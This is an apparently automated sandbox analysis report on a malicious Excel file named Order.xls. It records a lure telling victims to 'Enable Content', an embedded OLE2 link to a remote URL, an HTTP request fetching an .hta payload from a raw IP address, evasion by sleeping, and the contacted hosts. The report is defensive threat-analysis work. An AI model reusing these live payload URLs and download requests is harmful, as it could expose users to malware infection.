Windows Analysis Report
Order.xls

Overview

General Information

Sample name:	Order.xls
Analysis ID:	1592075
MD5:	439a22208699135960b30717b0aeedbc
SHA1:	f0a626b392d2cf72659b567e8a75d8d862195669
SHA256:	b04e78fa62cab8562fdcd884fa8813a4e802c8f78bfa8c1d25db2a8684868dd0
Tags:	xlsuser-abuse_ch
Infos:

Detection

Score:	72
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for submitted file

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Excel sheet contains many unusual embedded objects

Machine Learning detection for sample

Document contains embedded VBA macros

Document embeds suspicious OLE2 link

Document misses a certain OLE stream usually present in this Microsoft Office document type

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Excel Network Connections

Sigma detected: Suspicious Office Outbound Connections

Uses a known web browser user agent for HTTP communication

Classification

Signatures

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Order.xls

Avira: detected

Multi AV Scanner detection for submitted file

Source: Order.xls

ReversingLabs: Detection: 36%

Machine Learning detection for sample

Source: Order.xls

Joe Sandbox ML: detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 14.103.79.10:443 -> 192.168.2.10:49990 version: TLS 1.2

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: s.deemos.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49991 -> 172.245.119.74:80
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic	TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic	TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic	TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic	TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic	TCP traffic: 192.168.2.10:49991 -> 172.245.119.74:80
Source: global traffic	TCP traffic: 172.245.119.74:80 -> 192.168.2.10:49991
Source: global traffic	TCP traffic: 192.168.2.10:49991 -> 172.245.119.74:80
Source: global traffic	TCP traffic: 192.168.2.10:49991 -> 172.245.119.74:80
Source: global traffic	TCP traffic: 172.245.119.74:80 -> 192.168.2.10:49991
Source: global traffic	TCP traffic: 172.245.119.74:80 -> 192.168.2.10:49991
Source: global traffic	TCP traffic: 192.168.2.10:49991 -> 172.245.119.74:80
Source: global traffic	TCP traffic: 192.168.2.10:49991 -> 172.245.119.74:80
Source: global traffic	TCP traffic: 172.245.119.74:80 -> 192.168.2.10:49991

Source: excel.exe

Memory has grown: Private usage: 2MB later: 97MB

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 14.103.79.10 14.103.79.10

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View

JA3 fingerprint: 6271f898ce5be7dd52b0fc260d0662b3

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&window HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/sns/createdbestthingsforhappinesswithoutmegivenyouforher.hta HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.119.74

Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknown	TCP traffic detected without corresponding DNS query: 172.245.119.74
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&window HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: s.deemos.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xampp/sns/createdbestthingsforhappinesswithoutmegivenyouforher.hta HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoConnection: Keep-AliveHost: 172.245.119.74

Source: global traffic

DNS traffic detected: DNS query: s.deemos.com

Source: Order.xls, A3430000.0.dr

String found in binary or memory: https://s.deemos.com/ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&window

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49990
Source: unknown	Network traffic detected: HTTP traffic on port 49990 -> 443

Source: unknown

HTTPS traffic detected: 14.103.79.10:443 -> 192.168.2.10:49990 version: TLS 1.2

System Summary

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)

Source: screenshot	OCR: document is protected the document in If this dcxurnent was Once you have enabled 3 iting, please cl
Source: screenshot	OCR: Enable Content" from the yellow bar above dcxuments the yellow bar above Sheet2 Sheet3 Ready & Acces
Source: screenshot	OCR: document is protected Tab O Office 2 20 Rea the dxument in If this docurnent was the yellow bar abo
Source: screenshot	OCR: Enable Content" from the yellow bar atx:yve BNAGMGS... EEGV.'XUH... EIVQSAOTAC_ EO'VRVP... Sheetz S
Source: screenshot	OCR: document is protected the document in If this dcxurnent was Once you have enabled O 3 editing, pleas
Source: screenshot	OCR: Enable Content" from the yellow bar above dcxuments the yellow bar above Renmks. 1 : Above price is
Source: screenshot	OCR: document is protected the document in If this dcxurnent was Once you have enabled O 3 editing, pleas
Source: screenshot	OCR: Enable Content" from the yellow bar above dcxuments the yellow bar above Renmks. 1 : Above price is
Source: screenshot	OCR: document is protected 16 17 18 19 20 27 28 29 30 N.o.R ac VsI drop Anchor u Tanks ins s Tanks inss I
Source: screenshot	OCR: Enable Content" from Final calculation started Final calculation ended Cargo arm disconnected Shippe
Source: screenshot	OCR: document is protected Open the dckument in Microsoft Office previewing online is not available for 2
Source: screenshot	OCR: Enable Content" from Sheetl Sheet2 Ready Accessibility: Investigate Sheet3 Final calculation started

Excel sheet contains many unusual embedded objects

Source: Order.xls	OLE: Microsoft Excel 2007+
Source: Order.xls	OLE: Microsoft Excel 2007+
Source: Order.xls	OLE: Microsoft Excel 2007+
Source: A3430000.0.dr	OLE: Microsoft Excel 2007+
Source: A3430000.0.dr	OLE: Microsoft Excel 2007+

Document contains embedded VBA macros

Source: Order.xls

OLE indicator, VBA macros: true

Document embeds suspicious OLE2 link

Source: Order.xls	Stream path 'MBD0047BAAB/\x1Ole' : https://s.deemos.com/ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&window~9[PxqWl> RQtzF}-iik[hpy1,,{6X`+\|gL[cMnjD0`1{(+i(g=WddEG1;;zn-8l;Mj/KSuC,Wqk%h*d`A],0YctZFNmkG9Pi8qjdVBAEjR3cYCilTaG3qtEh3qqO17QvBUvwMY4cyu4t9ESIqKt6K11qER2aBq0qzGGV5JVb1UVplt7937QdsyUMf2VuiS753J2R7r9RNhBKOCXSsDQbOYlbZ0xjXfbQL9IWgGwWwWh0pukRPLHWSHRpYwqkYDbZERe2waqE2BGt1b1OEKySqV3Xdd%[/Duxpp'1[X.+
Source: A3430000.0.dr	Stream path 'MBD0047BAAB/\x1Ole' : https://s.deemos.com/ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&window~9[PxqWl> RQtzF}-iik[hpy1,,{6X`+\|gL[cMnjD0`1{(+i(g=WddEG1;;zn-8l;Mj/KSuC,Wqk%h*d`A],0YctZFNmkG9Pi8qjdVBAEjR3cYCilTaG3qtEh3qqO17QvBUvwMY4cyu4t9ESIqKt6K11qER2aBq0qzGGV5JVb1UVplt7937QdsyUMf2VuiS753J2R7r9RNhBKOCXSsDQbOYlbZ0xjXfbQL9IWgGwWwWh0pukRPLHWSHRpYwqkYDbZERe2waqE2BGt1b1OEKySqV3Xdd%[/Duxpp'1[X.+

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: ~DFBA0519920D42AF1E.TMP.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: classification engine

Classification label: mal72.winXLS@4/9@1/2

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Users\user\Desktop\A3430000

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{A785AF81-2D41-4623-851C-82C67F9C24C6} - OProcSessId.dat

Jump to behavior

Source: Order.xls	OLE indicator, Workbook stream: true
Source: A3430000.0.dr	OLE indicator, Workbook stream: true

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: Order.xls

ReversingLabs: Detection: 36%

Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
Source: unknown	Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\Order.xls"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288	Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Automated click: OK
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Automated click: OK

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common

Jump to behavior

Source: Order.xls

Static file information: File size 1275904 > 1048576

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: ~DFBA0519920D42AF1E.TMP.0.dr

Initial sample: OLE indicators vbamacros = False

Source: Order.xls

Initial sample: OLE indicators encrypted = True

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\splwow64.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: Order.xls	Stream path 'Workbook' entropy: 7.99915790275 (max. 8.0)
Source: A3430000.0.dr	Stream path 'Workbook' entropy: 7.99586369302 (max. 8.0)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\splwow64.exe

Window / User API: threadDelayed 742

Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\splwow64.exe	Last function: Thread delayed
Source: C:\Windows\splwow64.exe	Last function: Thread delayed

Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000			Jump to behavior
Source: C:\Windows\splwow64.exe	Thread delayed: delay time: 120000			Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

Process information queried: ProcessInformation

Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
14.103.79.10	s.deemos.com	China		18002	WORLDPHONE-INASNumberforInterdomainRoutingIN	false
172.245.119.74	unknown	United States		36352	AS-COLOCROSSINGUS	false

Contacted Domains

Name	IP	Active
bg.microsoft.map.fastly.net	199.232.210.172	true
s.deemos.com	14.103.79.10	true
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://s.deemos.com/ZlCPR27v?&impress=verdant&gown=sincere&lightning=fretful&window	false	Avira URL Cloud: safe	unknown

AV Detection

Antivirus / Scanner detection for submitted sample

Source: Order.xls

Avira: detected

Multi AV Scanner detection for submitted file

Source: Order.xls

ReversingLabs: Detection: 36%

Machine Learning detection for sample

Source: Order.xls

Joe Sandbox ML: detected

Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE

File opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 14.103.79.10:443 -> 192.168.2.10:49990 version: TLS 1.2

Potential document exploit detected (performs DNS queries)

Source: global traffic

DNS query: name: s.deemos.com

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49991 -> 172.245.119.74:80
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 192.168.2.10:49990 -> 14.103.79.10:443
Source: global traffic	TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
Source: global traffic	TCP traffic: 14.103.79.10:443 -> 192.168.2.10:49990
